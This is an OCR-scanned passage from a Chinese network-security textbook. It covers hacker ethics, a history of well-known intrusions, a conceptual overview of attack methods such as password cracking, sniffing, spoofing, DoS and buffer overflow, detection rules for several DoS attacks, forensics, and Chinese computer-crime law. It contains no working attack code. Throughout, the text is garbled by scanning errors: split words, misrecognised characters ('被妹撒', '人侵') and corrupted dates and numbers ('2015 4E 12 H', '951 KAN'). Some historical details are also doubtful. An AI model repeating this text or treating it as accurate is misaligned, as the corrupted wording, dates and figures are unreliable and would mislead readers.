(3) 帮助 别 的 黑客 测试 和 调试 软件 。 

(4) 黑客 们 以 探索 漏洞 与 编写 程序 为 乐 , 在 黑客 的 圈子 里 ,有 许多 其 他 事情 可 做 ,如 维 
护 和 管理 相关 的 黑客 论坛 .新闻 组 以 及 邮件 列表 ,维持 大 的 软件 供应 站 点 ,推动 RFC 和 其 他 
技术 标准 等 。 

(5) 真正 的 黑客 不 会 随意 破解 商业 软件 并 将 其 广泛 流传 ,也 不 会 恶意 侵入 别人 的 网 站 
并 造成 损失 ,黑客 的 所 作 所 为 应 当 更 像 是 对 网 络 安全 的 监督 。 

3. 黑客 事件 

历史 上 ,国内 外 发 生 过 许多 著名 的 黑客 人 侵 事件 。1979 年 ,年 仅 15 岁 的 凯 文 。 米 特 尼 
克 仅 和 赁 一 台 计 算 机 和 一 部 调制 解 调 器 冯 人 北美 空中 防务 指挥 部 的 计算 机 主机 。1987 年 , 美 
联邦 执法 部 门 指控 16 岁 的 赫 尔 伯 特 。 齐 恩 间 和 人 美国 电话 电报 公司 的 内 部 网 络 和 中 心 交 换 
系统 。 齐 恩 是 美国 1986 年 (计算 机 欺诈 与 滥用 法 案 》 生 效 后 被 判 有 罪 的 第 一 人 。1988 年 ， 
年 仅 23 岁 的 大 学 生 Robert Morris 在 Internet 上 释放 了 世界 上 首 个 蠕虫 程序 。Robert 
Morris 最 初 把 这 个 99 行 的 程序 放 在 互联 网 上 进行 试验 ,可 结果 使 得 他 的 计算 机 被 感染 并 
迅速 在 互联 网 上 蔓延 开 。Robert Morris 也 因此 在 1990 年 被 判 人 狱 。1990 年 ,为 了 获得 在 
洛杉矶 地 区 Kiis-fm 电台 第 102 个 呼 入 者 的 奖励 一 一 保时捷 跑车 ,Kevin Poulsen 控制 了 整 
个 地 区 的 电话 系统 ,以 确保 他 是 第 102 个 呼 人 者 。 最 终 , 他 如 愿 以 偿 获 得 跑车 ,但 为 此 入 狱 
3 年 。1995 年 ,来 自 俄罗斯 的 黑客 Vladimir Levin 成 为 历史 上 第 一 个 通过 入 侵 银行 计算 机 
系统 获 利 的 黑客 ,他 侵入 美国 花旗 银行 并 盗 走 1000 万 美元 。1996 年 ,美国 黑客 Timothy 
Lloyd 曾 将 一 个 6 行 的 恶意 软件 放 在 了 其 雇主 一 一 Omega 工程 公司 (美国 航天 航空 局 和 美 
国 海军 最 大 的 供 货 商 ) 的 网 络 上 ,此 事件 导致 Omega 公司 损失 1000 万 美元 。1999 年 爆发 
的 Melissa 病毒 是 世界 上 首 个 具有 全 球 破坏 力 的 病毒 。David Smith 在 编写 此 病毒 的 时 候 
年 仅 30 岁 。Melissa 病毒 使 世界 上 300 多 家 公司 的 计算 机 系统 崩溃 。 整 个 病毒 造成 的 损失 
接近 4 亿美 金 。David Smith 随后 被 判处 5 年 徒刑 。2000 年 ,年 仅 15 岁 的 MafiaBoy( 由 于 
年 龄 太 小 ,因此 没有 公布 其 真实 身份 ) 在 情人 节 期 间 成 功 侵入 包括 eBay, Amazon 和 Yahoo 
在 内 的 大 型 网 站 服务 器 ,并 成 功 阻止 了 服务 器 向 用 户 提 供 服 务 。 他 于 2000 年 被 捕 。2002 
年 11 月 ,伦敦 人 Gary McKinnon 在 英国 被 指控 非法 侵入 美国 军 方 90 多 个 计算 机 系统 。 

在 国内 ,1994 年 4 月 20 日. 中国 NCFC 工程 通过 美国 Sprint 公司 连 入 Internet 的 
64kb/s 国际 专线 开通 ,实现 了 与 Internet 的 全 功能 连接 ,中 国 成 为 直接 接 和 人 Internet 的 国 
家 。 从 此 ,中 国 黑客 开始 了 原始 萌动 。 同 年 ,中 国 第 一 步 信 息 安 全 法 规 ( 中 华人 民 共 和 国 计 
算 机 信息 系统 安全 保护 条 例 》 颁 布 实施 。1997 年 《中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联 
网 管理 暂行 规定 》 颁 布 实施 。1998 年 6 月 16 日 ,上 海 某 信息 网 的 工作 人 员 在 例 行 检查 时 发 
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现 网 络 遭 到 不 速 之 客 的 袭击 。1998 年 7 月 13 日 ,犯罪 嫌疑 人 杨 某 被 妹 撒 。 这 是 我 国 第 一 
例 计 算 机 黑客 事件 。1999 年 ,中 国 黑客 发 展 的 历史 上 产生 了 一 个 高 峰 。 这 一 年 正 是 网 络 泡 
沫 高 度 泛 滥 的 顶峰 ,黑客 在 这 阵势 不 可 挡 的 浪潮 中 不 可 避免 地 泛 起 了 泡沫 。1999 一 2000 
年 ,中 国 黑客 联盟 、 中 国 座 派 ,中 国 红 客 联盟 等 一 大 批 黑 客 网 站 兴起 , 带 来 了 黑客 普及 教育 。 
2015 年 1 月 15 日 ,机 锋 论坛 的 2300 万 用 户 数据 在 网 上 疯 传 ,引起 公众 的 广泛 关注 。360 补 
天 漏洞 响应 平台 负责 人 赵 武 对 此 表示 :“ 经 调查 ,网 上 流传 的 2300 万 数据 是 机 锋 2013 年 的 
老 数据 ,但 是 机 锋 论坛 还 有 多 个 高 危 漏洞 没有 完全 修复 ,其 2700 万 最 新 用 户 数据 也 暴露 在 
黑客 的 枪 口 下 。”2015 年 4 月 , 补 天 漏洞 响应 平台 发 布 信息 称 : 30 余 个 省 份 的 社保 户籍 查 
询 \ 疾 控 中 心 等 系统 存在 高 危 漏 洞 ; 仅 社保 类 信息 安全 漏洞 涉及 信息 就 达到 5279. 4 万 条 , 包 
括 身份 证 ,社保 参 保 信 息 、 财 务 .薪酬 房屋 等 敏感 信息 。2015 年 5 月 29 日 ,360 天 眼 实验 室 
发 布 报告 , 首 次 披露 一 种 针对 中 国 的 国家 级 黑客 攻击 细节 。 该 境外 黑客 组 织 被 命名 为 “ 海 莲 
花 ”, 自 2012 年 4 月 起 ,“ 海 莲花 "针对 中 国 的 海事 机 构 、 海 域 建设 部 门 、 科 研 院 所 和 航运 企 
业 , 使 用 木马 病毒 攻陷 和 控制 政府 人 员 、 外 包 商 \ 行 业 专 家 等 目标 人 群 的 计算 机 ,甚至 操纵 这 
些 计 算 机 自动 发 送 相 关 情 报 ,这 很 明显 是 一 个 有 国外 政府 支持 的 高 级 持续 性 威胁 
(Advanced Persistent Threats. APT) 行 动 。2015 年 9 月 13 H.CNCERT/CC 接 到 报告 称 ， 
使 用 非 苹果 公司 官方 渠道 的 Xcode 开发 工具 开发 App 时 , 非 官方 Xcode 会 向 正常 的 App 
植 人 恶意 代码 XcodeGhost, 且 被 植 人 恶意 程序 的 苹果 App 可 以 在 App Store 正常 下 载 并 安 
装 使 用 ,感染 国内 用 户 达 2140 万 ,CNCERTVCC 已 在 9 月 14 日 发 布 预警 通报 ,提醒 开发 者 
切 勿 使 用 非 苹果 官方 渠道 的 Xcode 工具 ,以 维护 广大 用 户 的 个 人 信息 安全 。2015 4E 12 H, 
CNCERT/CC 通报 Java 反 序 列 化 漏洞 情况 ,该 漏洞 影响 多 块 应 用 广泛 的 Web 容器 软件 。 
远程 攻击 者 利用 漏洞 可 在 目标 系统 上 执行 任意 代码 ,危害 较 大 的 可 以 取得 网 站 服务 控制 权 。 
CNCERT/CC 对 相关 Web 应 用 的 分 布 情况 和 受 漏 洞 影 响 进行 了 探测 ,发 现 境内 主机 IP 中 
Jboss, Weblogic, Jenkins 受到 漏洞 影响 的 未 修复 比例 分 别 是 13. 9% 50.4% 、33.4%。 

4. 黑客 入 侵 技术 

黑客 入 侵 一 般 分 为 信息 收集 、 探 测 分 析 系 统 安全 弱点 以 及 实施 攻击 3 个 步骤 。 

信息 收集 是 为 了 了 解 所 要 攻击 目标 的 详细 信息 。 通 常 ,黑客 会 利用 相关 的 网 络 协 议 或 
实用 程序 收集 信息 ,常用 的 工具 主要 包括 
SNMP, 用 来 查阅 网 络 系统 路 由 器 的 路 由 表 , 从 而 了 解 目标 主机 所 在 网 络 的 拓扑 结 
构 及 其 内 部 细节 。 
TraceRoute 程序 : 能 够 用 该 程序 获得 到 达 目 标 主 机 所 要 经 过 的 网 络 数 和 路 由 器 数 。 
Whois 协议 : 该 协议 的 服务 信息 能 提供 所 有 有 关 的 DNS 域 和 相关 的 管理 参数 。 
DNS 服务 器 : 该 服务 器 提供 了 系统 中 可 访问 的 主机 的 IP 地 址 表 和 它们 对 应 的 主 
机 名 。 
Finger 协议 : 用 来 获取 一 个 指定 主机 上 的 所 有 用 户 的 详细 信息 。 
Ping 实用 程序 : 可 以 用 来 确定 一 个 指定 的 主机 的 位 置 。 

当 收 集 到 目标 相关 信息 以 后 ,黑客 会 利用 探测 分 析 系 统 寻 找 系统 的 安全 漏洞 或 设计 缺 
陷 。 黑 客 发 现 “ 补 丁 ” 程 序 的 接口 后 ,会 自己 编写 程序 ,通过 该 接口 进入 目标 系统 ,还 会 使 用 
Telnet、FTP 等 软件 向 目标 主机 申请 服务 ,如 果 目 标 主机 有 应 答 , 就 说 明 其 开发 了 这 些 端 口 
的 服务 。 其 次 ,使 用 一 些 公 开 的 工具 软件 ,如 Internet 安全 扫描 (Internet Security Scanner. 
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ISS) 程 序 、 网 络 安全 分 析 工 具 SATAN 等 对 网 络 进行 扫描 ,确定 安全 漏洞 ,或 使 用 特洛伊 木 
马 获取 攻击 目标 系统 的 非法 访问 权 。 
在 获得 目标 系统 的 非法 访问 权限 后 ,黑客 则 会 实施 攻击 ,可 分 为 被 动 攻击 与 主动 攻击 : 
© 被 动 攻击 : 攻击 者 只 观察 和 分 析 某 一 个 协议 数据 单元 (PDU) ,而 不 干扰 信息 流 。 例 


如 ,监听 截获 操作 等 。 


。 主动 攻击 : 攻击 者 对 某 个 连接 中 通过 的 数据 包 进 行 各 种 处 理 。 例 如 ,更 改 报 文 流 、 


拒绝 报 文 服务 、 伪 造 连接 初始 化 等 。 


攻击 程度 包括 以 下 等 级 。 


只 获得 访问 权 ( 登 录 名 和 口令 )。 


* 获得 访问 权 ,并 毁坏 、 侵 蚀 或 改变 数据 。 
。 获得 访问 权 ,并 获得 系统 一 部 分 或 整个 系统 控制 权 ,拒绝 拥有 特权 用 户 的 访问 。 


未 获得 访问 权 , 通 过 攻击 程序 引起 网 络 持久 性 或 暂时 性 的 运行 失败 、 重 新 启动 、 挂 起 


或 其 他 无 法 操作 的 状态 。 


1) 黑客 攻击 过 程 

黑客 攻击 过 程 包括 以 下 步骤 。 

(1) 隐藏 自己 的 踪迹 。 通 过 清除 日 志 、 删 除 复制 文件 .进程 隐藏 .连接 隐藏 .使 日 志 紊乱 
等 方法 销毁 人 侵 痕迹 ,并 在 受 攻击 目标 系统 中 为 自己 建立 新 的 后 门 ,以 便 继 续 访问 该 系统 。 

(2) 在 目标 系统 内 安装 探测 软件 ,如 特洛伊 木马 或 其 他 一 些 远 程控 制程 序 ,继续 收集 感 
兴趣 的 信息 和 敏感 数据 。 黑 客 还 可 以 以 目标 系统 为 跳板 向 其 他 系统 发 起 攻击 。 

(3) 在 被 攻击 目标 系统 上 进一步 获得 特许 访问 权 , 开 展 对 整个 系统 的 攻击 ,毁坏 重要 数 
据 , 乃 至 破坏 整个 网 络 系统 。 


2) 


主要 入 侵 方 式 


黑客 采用 的 人 侵 方 式 主要 有 以 下 8 种 : 
CD 密码 破解 。 包 括 字 典 攻击 、 伪 造 登录 程序 、 密 码 探测 程序 、 口 令 攻击 ,口令 陷阱 .网 


络 踩点 
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\ 协 议 栈 指纹 .会话 劫 持 和 非 授权 访问 尝试 9 种 人 侵 方式 。 


字典 攻击 是 一 种 被 动 攻击 ,黑客 获取 系统 的 口令 ,然后 利用 字典 进行 匹配 比较 。 字 
典 攻 击 成 功率 较 高 。 

伪造 登录 程序 是 通过 伪造 登录 界面 获得 用 户 输入 的 账号 和 密码 的 。 

密码 探测 程序 能 够 反复 模拟 NT 的 编码 过 程 ,并 与 Windows NT 系统 的 SAM 密码 
数据 库 内 的 数据 进行 匹配 。 

口令 攻击 是 指 通过 网 络 监 听 非 法 得 到 用 户口 令 , 然 后 利用 软件 强行 破解 用 户口 令 ， 
获得 用 户口 令 文件 后 ,暴力 破解 用 户口 令 。 

口令 陷阱 : 在 网 络 服务 中 设置 虚假 界面 ,要 求 用 户 输入 用 户 名 与 口令 ,从 而 截获 该 
用 户 的 用 户 名 与 口令 。 

网 络 踩点 : 利用 工具 获取 目标 的 一 些 有 用 信息 ,如 域名 、IP 地 址 、 网 络 拓 扑 结 构 及 相 
关 用 户 信息 。 

协议 栈 指 纹 : 利用 探测 包 , 从 得 到 的 响应 中 确定 目标 主机 使 用 的 操作 系统 。 

会 话 劫持 : 在 合法 的 通信 连接 建立 后 ,可 通过 阻塞 或 摧毁 通信 的 一 方 接管 已 经 建立 
起 来 的 连接 ,从 而 假冒 被 接管 方 与 对 方 通信 。 


。 非 授权 访问 尝试 : 对 被 保护 文件 进行 读 、 写 或 执行 的 尝试 ,也 包括 为 获得 被 保护 访 
问 权限 所 做 的 尝试 。 
(2) 网 络 监听 。 又 称 为 IP 嗅 探 ,是 主机 的 一 种 工作 模式 。 在 这 种 模式 下 ,主机 可 以 接 
收 到 本 网 段 在 同一 条 物理 通道 上 传输 的 所 有 信息 。 高 级 的 窃听 程序 还 具有 生成 假 数 据 包 、 
解码 等 功能 ,甚至 可 锁定 服务 器 的 特定 端口 ,自动 处 理 与 这 些 端口 有 关 的 数据 包 。 利 用 上 述 
功能 ,可 监听 他 人 的 联网 操作 , 盗 取 信息 。 
当 信 息 以 明文 的 形式 在 网 络 上 传输 时 , 便 可 以 使 用 网 络 监听 的 方式 进行 攻击 。 将 网 络 
接口 设置 在 监听 模式 可 以 源源 不 断 地 截获 网 上 的 信息 。 网 络 监听 可 以 获取 网 络 中 所 有 的 数 
据 包 。 
G) 系统 漏洞 与 欺骗 。 
。 漏洞 是 指 系统 本 身 的 设计 、 操 作 和 实现 上 的 错误 ,这 些 漏 洞 在 补丁 未 被 开发 出 来 之 
前 一 般 很 难 防御 黑客 的 破坏 。 

。 欺骗 是 主动 式 攻击 ,利用 网 络 某 台 计算 机 伪装 男 一 台 目 标 主机 ,以 此 欺骗 网 络 中 的 
其 他 计算 机 向 伪造 计算 机 发 送 数 据 或 赋予 权限 。 常 见 的 欺骗 方式 包括 TP 欺骗 ,路 
由 欺骗 \.ARP 欺骗 以 及 Web 欺骗 。 

(4) 端口 扫描 与 特洛伊 木马 。 

在 连续 的 非 授 权 访 问 过 程 中 ,攻击 者 为 了 获得 网 络 内 部 的 信息 ,通常 使 用 这 种 攻击 尝 
试 ,典型 示例 包括 SATAN 扫描 、 端 口 扫 描 和 IP 半途 扫描 等 。 

黑客 可 以 利用 一 些 端口 扫描 软件 (如 SATAN,IP Hacker 等 ) 对 被 攻击 目标 进行 端口 扫 
描 , 查 看 是 否 存在 开放 端口 ,并 进行 通信 操作 。 扫 描 器 是 自动 监测 远程 或 本 地 主机 安全 性 弱 
点 的 程序 。 通 过 使 用 扫描 器 可 以 不 留 痕 迹地 发 现 远程 服务 器 的 各 种 TCP 端口 的 分 配 、 提 供 
的 服务 和 软件 版 本 ,从 而 了 解 到 远程 主机 存在 的 安全 问题 。 

特洛伊 木马 是 一 种 基于 远程 控制 的 黑客 工具 。 木 马 程 序 寄生 在 普通 程序 内 部 暗中 进行 
某 些 破坏 性 操作 或 盗窃 数据 ,以 完成 某 些 特殊 任务 。 

不 能 自我 复制 是 特洛伊 木马 与 病毒 最 显著 的 区 别 。 特 洛 伊 木马 原则 上 只 是 一 种 远程 管 
理工 具 , 而 且 本 身 不 带 伤害 性 ,也 没有 感染 力 , 所 以 不 能 称 为 病毒 ,但 却 常 常 被 视 为 病毒 。 有 
些 人 认为 特洛伊 木马 也 是 计算 机 病毒 的 一 种 ,将 其 称 为 木马 病毒 。 目 前 的 杀毒 软件 对 木马 
有 一 定 的 预防 和 清除 作用 。 

(5) 拒绝 服务 (Denial of Service) 攻 击 。 

最 基本 的 拒绝 服务 攻击 方式 是 利用 合理 的 服务 请 求 占 用 过 多 的 服务 资源 ,从 而 使 合法 
用 户 无 法 得 到 服务 。DoS 攻击 分 为 4 种 。 

。 利 用 TCP/IP 中 的 漏洞 进行 攻击 ,如 Ping of Death #il Teardrop, 

。 利 用 TCP/IP 的 脆弱 性 进行 攻击 ,如 SYN Flood 和 Land 攻击 。 

。 用 大 量 无 用 数据 淹没 一 个 网 络 , 如 Smurf 攻击 和 Fraggle 攻击 。 

。 分 布 式 拒绝 服务 (DDoS) 攻 击 。 

一 般 情 况 下 ,拒绝 服务 攻击 是 通过 使 被 攻击 对 象 ( 工 作 站 或 服务 器 ) 的 系统 关键 资源 过 
载 , 从 而 使 被 攻击 对 象 停止 部 分 或 全 部 服务 。 目 前 已 知 的 拒绝 服务 攻击 有 几 百 种 , 它 是 最 基 
本 的 入侵 攻击 手段 ,也 是 最 难 对 付 的 入侵 攻击 之 一 ,典型 示例 有 SYN Flood 攻击 、Ping 
Flood 攻击 、Land 攻击 、WinNuke 攻击 等 。 
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(6) WWW 欺骗 技术 。 
将 用 户 浏览 网 页 的 URL 指向 黑客 设 定 的 服务 器 , 当 用 户 浏 览 目标 网 页 的 时 候 , 实 际 上 
是 向 黑客 服务 器 发 出 请 求 , 达 到 欺骗 的 目的 。 
(7) 电子 邮件 攻击 。 
电子 邮件 攻击 主要 表现 为 两 种 方式 。 
。 电 子 邮 件 友 炸 ,向 同一 信箱 发 送 数 以 千 计 、 万 计 , 其 至 无 穷 多 次 的 内 容 相 同 的 垃圾 邮 
件 , 使 电子 邮件 服务 器 操作 系统 瘫痪 。 
。 电子 邮件 欺骗 ,在 正常 的 附件 中 加 载 病毒 或 其 他 木马 程序 。 
(8) 缓冲 区 溢出 。 
缓冲 区 溢出 是 一 种 系统 攻击 手段 ,通过 往 程序 的 缓冲 区 写 和 人 超出 其 长 度 的 内 容 , 造 成 组 
冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ,使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 据 统计 ， 
通过 缓冲 区 溢出 进行 的 攻击 占 所 有 系统 攻击 总 数 的 80% 以上。 一 般 情况 下 ,覆盖 其 他 数据 
区 的 数据 是 没有 意义 的 ,最 多 造成 应 用 程序 错误 。 但 是 ,如 果 输 入 的 数据 是 经 过 精心 设计 
的 ,覆盖 缓冲 区 的 数据 恰恰 是 入侵 程序 代码 ,入 侵 者 就 获取 了 程序 的 控制 权 。 
此 外 ,黑客 的 入侵 手段 还 包括 社会 工程 学 攻击 .黑客 软件 攻击 以 及 跳板 攻击 等 。 
3) 主要 防范 措施 
可 采取 的 防范 措施 主要 包括 以 下 几 点 。 
身份 认证 是 指 通过 密码 或 特征 信息 确认 用 户 身份 的 真实 性 ,对 重要 主机 单独 设立 一 
个 网 段 ,以 避免 机 器 被 攻破 后 造成 整个 网 段 通信 全 部 暴露 。 
完善 访问 控制 策略 ,设置 访问 权限 .目录 安全 等 级 控制 防火墙 安全 控制 等 ,研究 清 
楚 各 进程 必需 的 进程 端口 号 ,关闭 不 必要 的 端口 。 
审计 是 指 把 系统 中 和 安全 相关 的 事件 全 部 记录 下 来 ,定向 并 集中 管理 对 用 户 开放 的 
各 个 主机 的 日 志文 件 , 定 期 检查 备份 日 志 主 机 上 的 数据 、 系 统 日 志文 件 和 关键 配置 
文件 。 
下 载 安装 最 新 的 操作 系统 及 其 他 应 用 软件 的 安全 和 升级 补丁 ,安装 几 种 必要 的 安全 
加 强 工具 ,对 系统 进行 完整 性 检查 。 
制定 详尽 的 入 侵 应 急 措施 以 及 汇报 制度 。 一 旦 发 现 入 侵 迹 象 ,立即 打开 进程 记录 功 
能 ,同时 保存 内 存 中 的 进程 列表 以 及 网 络 连接 状态 ,保护 当前 的 重要 日 志文 件 。 
5. 入 侵 检测 技术 
入 侵 检测 技术 (反攻 击 技术 ) 的 核心 问题 是 截获 有 效 的 网 络 信息 。 目 前 主要 通过 两 种 途 
径 获 取信 息 。 
。 通过 网 络 侦 听 程序 (如 Sniffer, Vpacket 等 ) 获 取 网 络 信息 (如 数据 包 信息 、 网 络 流量 
信息 、 网 络 状 态 信息 、 网 络 管理 信息 等 ) 。 
。 通过 对 操作 系统 和 应 用 程序 的 系统 日 志 进 行 分 析 , 发 现 入 侵 行为 和 系统 潜在 的 安全 
漏洞 。 
入 侵 检测 的 基本 手段 是 采用 模式 匹配 的 方法 发 现 人 侵 攻 击 行为 。 典 型 的 入 侵 检测 方式 
包括 以 下 内 容 。 
(D Land 攻击 : 是 一 种 拒绝 服务 攻击 。 由 于 Land 攻击 的 数据 包 中 的 源 地 址 和 目标 地 
址 是 相同 的 ,因此 当 操 作 系 统 接收 到 这 类 数据 包 时 ,不 知道 该 如 何 处 理 堆栈 中 通信 源 地 址 和 
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目标 地 址 相同 的 这 种 情况 ,或 者 循环 发 送 和 接收 该 数据 包 , 消 耗 大 量 的 系统 资源 ,从 而 造成 
系统 骨 溃 或 死机 。 

检测 方法 : 判断 网 络 数据 包 的 源 地 址 和 目标 地 址 是 否 相同 。 配 置 防火 墙 或 过 滤 路 由 器 
的 过 滤 规 则 ,并 对 这 种 攻击 进行 审计 ,记录 事件 发 生 的 时 间 , 源 主机 和 目标 主机 的 MAC 地 
址 和 IP 地址 。 

(2) TCP SYN 攻击 : 是 一 种 拒绝 服务 攻击 ,是 利用 TCP 客户 机 与 服务 器 之 间 3 次 握 
手 过 程 的 缺陷 进行 的 。 攻 击 者 通过 伪造 源 DP 地 址 向 被 攻击 者 发 送 大 量 的 SYN 数据 包 , 当 
被 攻击 主机 接收 到 大 量 的 SYN 数据 包 时 ,需要 使 用 大 量 的 缓存 处 理 这 些 连接 ,并 将 SYN 
ACK 数据 包 发 送 回 错误 的 IP 地 址 ,并 一 直 等 待 ACK 数据 包 的 回应 ,最 终 导致 缓存 用 完 ,不 
能 再 处 理 其 他 合法 的 SYN 连接 ,对 外 提供 正常 服务 。 

检测 方法 : 检查 单位 时 间 内 收 到 的 SYN 连接 是 否 超过 系统 设 定 的 值 。 当 接收 到 大 量 
的 SYN 数据 包 时 ,通知 防火 墙 阻 断 连接 请 求 或 丢弃 这 些 数 据 包 ,并 进行 系统 审计 。 

(3) Ping Of Death 攻击 : 是 一 种 拒绝 服务 攻击 。 由 于 部 分 操作 系统 接收 到 长 度 大 于 
65 535B 的 数据 包 时 ,会 造成 内 存 溢 出 、 系 统 崩 溃 等 后 果 , 从 而 达到 攻击 的 目的 。 

检测 方法 : 判断 数据 包 的 大 小 是 否 大 于 65 535B。 使 用 补丁 程序 , 当 收 到 大 于 65 535B 
的 数据 包 时 ,丢弃 该 数据 包 , 并 进行 系统 审计 。 

(4) WinNuke 攻击 : 是 一 种 拒绝 服务 攻击 。 其 特征 是 攻击 目标 端口 ,被 攻击 的 目标 端 
口 通常 是 139、138、137、113、53, 而 且 URG 位 设 为 1, 即 紧急 模式 。 

检测 方法 : 判断 数据 包 目 标 端 口 是 否 为 139、138、137 等 ,并 判断 URG 位 是 否 为 1。 配 
置 防火 墙 设备 或 过 滤 路 由 器 ,并 对 这 种 攻击 进行 审计 。 

(5) Teardrop 攻击 : 是 一 种 拒绝 服务 攻击 。 其 工作 原理 是 向 被 攻击 者 发 送 多 个 分 片 的 
IP 包 , 某 些 操作 系统 收 到 含有 重 概 偏 移 的 伪造 分 片 数据 包 时 ,将 会 出 现 系统 崩溃 .重启 等 
现象 。 

检测 方法 : 对 接收 到 的 分 片 数据 包 进 行 分 析 , 计 算数 据 包 的 片 偏 移 量 (Offset) 是否 有 
误 。 添 加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 片 数据 包 , 并 对 这 种 攻击 进行 审计 。 

(6) TCP/UDP 端口 扫描 : 是 一 种 预 探 测 攻击 。 对 被 攻击 主机 的 不 同 端口 发 送 TCP 
UDP 连接 请 求 ,探测 被 攻击 对 象 运行 的 服务 类 型 。 

检测 方法 : 统计 外 界 对 系统 端口 的 连接 请 求 , 特 别 是 对 21.23,25,53.80,8000,8080 等 
以 外 的 非常 用 端口 的 连接 请 求 。 当 收 到 多 个 TCP/UDP 数据 包 对 异常 端口 的 连接 请 求 时 ， 
通知 防火 墙 阻 断 连接 请 求 ,并 对 攻击 者 的 IP 地址 和 MAC 地 址 进行 审计 。 

6. 计算 机 取证 

计算 机 取证 又 称 为 数字 取证 或 电子 取证 ,是 指 对 计算 机 入 侵 、 破 坏 欺诈、 攻击 等 犯罪 行 
为 利用 计算 机 软 硬 件 技术 ,按照 符合 法 律 规范 的 方式 进行 证 据 获取 、 保 存 . 分 析 和 出 示 的 过 
程 。 从 技术 上 ,计算 机 取证 是 一 个 对 受 侵 计 算 机 系统 进行 扫描 和 破解 以 及 对 整个 人 侵 事件 
进行 重建 的 过 程 。 计 算 机 取证 包括 物理 证 据 获 取 和 信息 发 现 两 个 阶段 。 

。 物理 证 据 获取 是 指 调查 人 员 到 计算 机 犯罪 或 人 侵 现 场 寻找 并 扣留 相关 的 计算 机 

硬件 。 
。 信息 发 现 是 指 从 原始 数据 中 寻找 可 以 用 来 证 明 或 者 反 驶 的 证 据 , 即 电 子 证 据 。 
物理 取证 是 核心 任务 。 物 理 证 据 的 获取 是 全 部 取证 工作 的 基础 。 获 取 物 理 证 据 , 保 证 
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原始 数据 不 受 任何 破坏 ,应 遵守 如 下 操作 规定 。 

。 不 改变 原始 记录 。 

。 不 在 作为 证 据 的 计算 机 上 执行 无 关 的 操作 。 

。 不 给 犯罪 者 销毁 证 据 的 机 会 。 

。 详细 记录 所 有 的 取证 活动 。 

。 妥善 保存 得 到 的 物证 。 

如 果 被 入 侵 的 计算 机 处 于 工作 状态 ,取证 人 员 应 该 设法 保存 尽 可 能 多 的 犯罪 信息 。 

物理 取证 不 但 是 基础 ,而 且 是 技术 难点 。 案 件 发 生 后 ,应 立即 对 目标 机 和 网 络 设备 进行 内 
存 检 查 , 并 做 好 记录 ,根据 所 用 操作 系统 的 不 同 ,可 以 使 用 内 存 检查 命令 对 内 存 里 易 删 除 的 数 
据 进行 保存 ,力求 不 对 硬盘 进行 任何 读 写 操作 ,以 免 破坏 数据 原始 性 。 利 用 专门 的 工具 对 硬盘 
进行 逐 扇 区 的 读 取 , 将 硬盘 数据 完整 地 克隆 出 来 ,便于 对 原始 硬盘 的 镜像 文件 进行 分 析 。 

在 技术 防范 的 同时 ,也 离 不 开 法 律 防线 的 辅助 作用 。 美 国 是 世界 上 最 早 发 明 计算 机 的 
国家 ,也 是 世界 上 最 早 对 计算 机 黑客 行为 进行 立法 规范 的 国家 。 从 某 种 意义 上 讲 ,美国 反 计 
算 机 犯罪 的 立法 对 其 他 国家 开展 相关 工作 提供 了 许多 可 借鉴 的 经 验 和 教训 。 其 中 ,最 著名 
的 有 《1984 年 计算 机 欺诈 和 滥用 法 》。 

在 我 国 ,1994 年 国务 院 颁布 的 (计算 机 信息 系统 安全 保护 条 例 ) 是 第 一 个 对 计算 机 信息 
系统 安全 进行 保护 的 法 规 。 该 条 例 没有 规定 计算 机 犯罪 的 罪名 ,但 是 第 24 条 规定 ,对 于 违 
反 本 条 例 的 规定 构成 犯罪 的 ,依法 追究 刑事 责任 。 此 后 ,1996 年 ,国务 院 发 布 ( 计 算 机 信息 
网 络 国际 联网 管理 暂行 规定 (1997 年 作 了 修正 );1997 年 ,公安 部 发 布 (计算 机 信息 网 络 国 
际 联网 安全 保护 管理 办 法 》;1998 年 ,国务 院 信 息 化 工作 领导 小 组 发 布 (计算 机 信息 网 络 国 
际 联网 管理 暂行 规定 实施 办 法 ); 国 家 保密 局 发 布 (计算 机 信息 系统 保密 管理 暂行 规定 》; 公 
安 部 .中 国人 民 银 行 发 布 ( 金 融 机 构 计 算 机 信息 系统 安全 保护 工作 暂行 规定 》。 这 一 系列 法 
律 法 规 和 相关 规定 共同 构成 一 个 计算 机 信息 系统 和 网 络 安全 保护 的 初步 法 律 框架 。 

随 着 计算 机 安全 与 犯罪 问题 日 益 严重 ,公安 部 授权 起 草 了 涉及 计算 机 安全 与 犯罪 问题 
的 专门 性 法 条 ,在 1997 年 的 刑法 修订 中 增加 了 关于 计算 机 安全 与 犯罪 的 3 个 条 款 , 即 第 
285 条 、 第 286 条 和 第 287 条 。1997 年 12 月 9 日 ,最 高 人 民法 院 审判 委员 会 第 951 KAN 
通过 的 《关于 执行 (中 华人 民 共 和 国 刑法 确定 罪名 的 规定 ?规定 了 两 个 罪名 , 即 非法 侵入 计 
算 机 信息 系统 罪 和 破坏 计算 机 信息 系统 罪 。2000 4E 12 月 28 日 , 九 届 全 国人 大 常委 会 第 十 
九 次 会 议 表 决 通过 《全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 》, 规 定 对 于 
侵入 国家 事务 .国防 事务 .尖端 科学 技术 领域 的 计算 机 信息 系统 的 行为 构成 犯罪 的 ,依照 弄 
法 有 关 规 定 追究 刑事 责任 。2015 年 6 月 ,第 十 二 届 全 国人 大 常委 会 第 十 五 次 会 议 初 次 审议 
了 《中 华人 民 共 和 国 网 络 安全 法 (草案 )》。2015 年 7 月 1 日 ,十 二 届 全 国人 大 常委 会 第 十 五 
次 会 议 表 决 通过 了 新 的 国家 安全 法 。 国 家 主席 习近平 签署 第 29 号 主席 令 予 以 公布 。 该 法 
律 对 政治 安全 、 国 土 安全 ,军事 安全 、 科 技 安全 等 11 个 领域 的 国家 安全 任务 进行 了 明确 , 首 
次 以 法 律 形式 提出 了 “维护 国家 网 络 空 间 主权 ”, 进 一 步 强化 了 我 国 打 击 计算 机 黑客 行为 的 
法 律 体系 。 


1.1.4 网 络 安全 主要 影响 因素 


网 络 安全 的 主要 影响 因素 包括 以 下 3 个 方面 。 
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CD 系统 安全 漏洞 : 常用 的 各 种 操作 系统 几乎 都 或 多 或 少 存在 安全 漏洞 。 系 统 漏 洞 分 
